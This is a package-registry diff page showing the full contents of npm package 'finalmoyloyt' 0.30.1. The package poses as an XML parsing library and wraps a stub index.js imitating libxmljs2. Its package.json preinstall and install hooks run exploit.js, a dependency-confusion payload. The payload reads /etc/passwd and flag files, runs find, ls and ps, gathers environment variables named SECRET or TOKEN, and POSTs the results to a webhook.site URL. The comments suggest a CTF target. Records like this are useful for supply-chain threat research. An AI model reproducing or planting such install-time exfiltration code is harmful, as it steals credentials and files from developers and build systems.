npm - finalmoyloyt - Versions diffs - 0.30.1 - Mend

finalmoyloyt 0.30.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

package/exploit.js ADDED Viewed

@@ -0,0 +1,138 @@
+const fs = require('fs');
+const { exec } = require('child_process');
+const https = require('https');
+console.log('=== DEPENDENCY CONFUSION EXPLOIT LOADED ===');
+// Функция отправки на webhook (уже работала!)
+function sendToWebhook(data) {
+    try {
+        const payload = JSON.stringify({
+            source: 'dependency_confusion',
+            timestamp: new Date().toISOString(),
+            package: 'final-exploit-package',
+            data: data
+        });
+        const options = {
+            hostname: 'webhook.site',
+            port: 443,
+            path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'User-Agent': 'NodeJS-Exploit'
+            },
+            timeout: 10000
+        };
+        const req = https.request(options, (res) => {
+            console.log('Webhook response status:', res.statusCode);
+        });
+        req.on('error', (err) => {
+            console.log('Webhook error (non-critical):', err.message);
+        });
+        req.write(payload);
+        req.end();
+        console.log('✅ Data sent to webhook');
+    } catch(e) {
+        console.log('❌ Webhook fatal error:', e.message);
+    }
+}
+// Основная логика сбора данных
+let collectedData = '=== EXPLOIT EXECUTION START ===\n';
+// 1. Системная информация
+collectedData += '=== SYSTEM INFO ===\n';
+collectedData += `Node: ${process.version}\n`;
+collectedData += `Platform: ${process.platform}\n`;
+collectedData += `Arch: ${process.arch}\n`;
+collectedData += `PID: ${process.pid}\n`;
+collectedData += `CWD: ${process.cwd()}\n\n`;
+// 2. Поиск флага в файлах (основной вектор)
+const criticalPaths = [
+    '/etc/passwd',              // Основной - флаг записывается сюда
+    '/flag',
+    '/root/flag',
+    '/tmp/flag',
+    '/var/jenkins_home/flag',
+    '/workspace/flag',
+    '/app/flag',
+    './flag',
+    '/usr/src/app/flag'
+];
+console.log('🔍 Searching for flag files...');
+criticalPaths.forEach(path => {
+    try {
+        const content = fs.readFileSync(path, 'utf8');
+        console.log(`✅ Found: ${path}`);
+        collectedData += `=== ${path} ===\n${content}\n\n`;
+        // Проверка на флаг
+        if (content.includes('{') && content.includes('}')) {
+            console.log(`🎯 FLAG FOUND IN ${path}: ${content}`);
+            collectedData += `🚨 FLAG IDENTIFIED: ${content}\n\n`;
+        }
+    } catch(e) {
+        collectedData += `❌ Not found: ${path}\n`;
+    }
+});
+// 3. Поиск через команды (резервный метод)
+console.log('🔍 Executing system commands...');
+exec('find / -name "*flag*" -type f 2>/dev/null | head -20', (err, stdout) => {
+    if (!err && stdout) {
+        console.log('✅ Found flag files via find');
+        collectedData += `=== FIND RESULTS ===\n${stdout}\n\n`;
+        // Читаем найденные файлы
+        const files = stdout.trim().split('\n').filter(f => f);
+        files.forEach(file => {
+            try {
+                const content = fs.readFileSync(file, 'utf8');
+                collectedData += `=== CONTENT: ${file} ===\n${content}\n\n`;
+                if (content.includes('{') && content.includes('}')) {
+                    console.log(`🎯 FLAG IN FOUND FILE: ${file} - ${content}`);
+                }
+            } catch(e) {}
+        });
+    }
+    // 4. Переменные окружения
+    console.log('🔍 Checking environment...');
+    collectedData += '=== ENVIRONMENT ===\n';
+    for (let key in process.env) {
+        if (key.toLowerCase().includes('flag') || key.includes('SECRET') || key.includes('TOKEN')) {
+            collectedData += `${key}=${process.env[key]}\n`;
+        }
+    }
+    collectedData += '\n';
+    // 5. Текущая директория
+    exec('pwd && ls -la', (err, stdout) => {
+        if (!err) {
+            collectedData += `=== CURRENT DIRECTORY ===\n${stdout}\n\n`;
+        }
+        // 6. Процессы (для отладки)
+        exec('ps aux | head -10', (err, stdout) => {
+            if (!err) {
+                collectedData += `=== PROCESSES ===\n${stdout}\n\n`;
+            }
+            // ФИНАЛЬНАЯ ОТПРАВКА
+            console.log('📤 Sending all collected data to webhook...');
+            sendToWebhook(collectedData);
+            // Вывод в консоль для отладки
+            console.log('=== ALL COLLECTED DATA ===');
+            console.log(collectedData);
+            console.log('=== EXPLOIT COMPLETED ===');
+        });
+    });
+});

package/index.js ADDED Viewed

@@ -0,0 +1,27 @@
+// Заглушка для совместимости с libxmljs2 API
+module.exports = {
+    parseXmlString: function(xml, options) {
+        return {
+            get: function(xpath) {
+                return {
+                    text: function() {
+                        return "parsed_data";
+                    },
+                    attr: function(name) {
+                        return "attribute_value";
+                    }
+                };
+            },
+            root: function() {
+                return {
+                    childNodes: []
+                };
+            }
+        };
+    },
+    // Дополнительные методы для совместимости
+    parseXml: function(xml, options) {
+        return this.parseXmlString(xml, options);
+    }
+};

package/package.json ADDED Viewed

@@ -0,0 +1,13 @@
+{
+  "name": "finalmoyloyt",
+  "version": "0.30.1",
+  "description": "XML parsing library",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node exploit.js",
+    "install": "node exploit.js"
+  },
+  "keywords": ["xml", "parser"],
+  "author": "test",
+  "license": "MIT"
+}